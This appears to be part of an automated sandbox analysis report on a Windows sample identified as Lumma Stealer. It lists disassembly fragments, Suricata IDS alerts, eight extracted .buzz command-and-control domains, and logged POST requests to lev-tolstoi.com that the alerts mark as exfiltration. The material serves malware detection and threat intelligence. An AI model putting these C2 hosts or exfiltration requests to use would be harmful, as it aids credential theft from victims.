                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0249DA09
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0249DA09
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0249EAA2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0249CB7E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_024B5BF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, di0_2_024B5BF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0249ABA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, ecx0_2_0249ABA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_024BB75E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BB75E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024A4806
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_024B0817
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_024C3897
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC8B1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC94B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_02499967
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_02499967
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_02499967
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024A6907
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov eax, edx0_2_024AC921
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_024B89C0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_024CA9DE
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC98D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC99C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_024C6E67
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], dx0_2_024A5F79
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024B1F77
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_024CCFC7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0249DF8C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_024CBC08
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_024B9C17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_024AEC17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_024C6C3B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov esi, eax0_2_024B3C9B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024CAD19
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_024CCD87

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.6:64950 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.6:54375 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.6:59569 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.6:63909 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.6:54503 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.6:54142 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.6:61581 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.6:56116 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49722 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49737 -> 172.67.157.254:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: scentniej.buzz
                    Source: Malware configuration extractorURLs: screwamusresz.buzz
                    Source: Malware configuration extractorURLs: appliacnesot.buzz
                    Source: Malware configuration extractorURLs: inherineau.buzz
                    Source: Malware configuration extractorURLs: hummskitnj.buzz
                    Source: Malware configuration extractorURLs: rebuildeso.buzz
                    Source: Malware configuration extractorURLs: cashfuzysao.buzz
                    Source: Malware configuration extractorURLs: prisonyfork.buzz
                    Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                    Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                    Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 172.67.157.254:443
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OVN8F7K2VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=12MYHXJSEBXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2520NUERQYQ21JEFV9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: lev-tolstoi.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=378308b36cb3d3ce49665561; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 28 Dec 2024 08:58:58 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tps://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                    Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                    Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                    Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                    Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                    Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                    Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                    Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
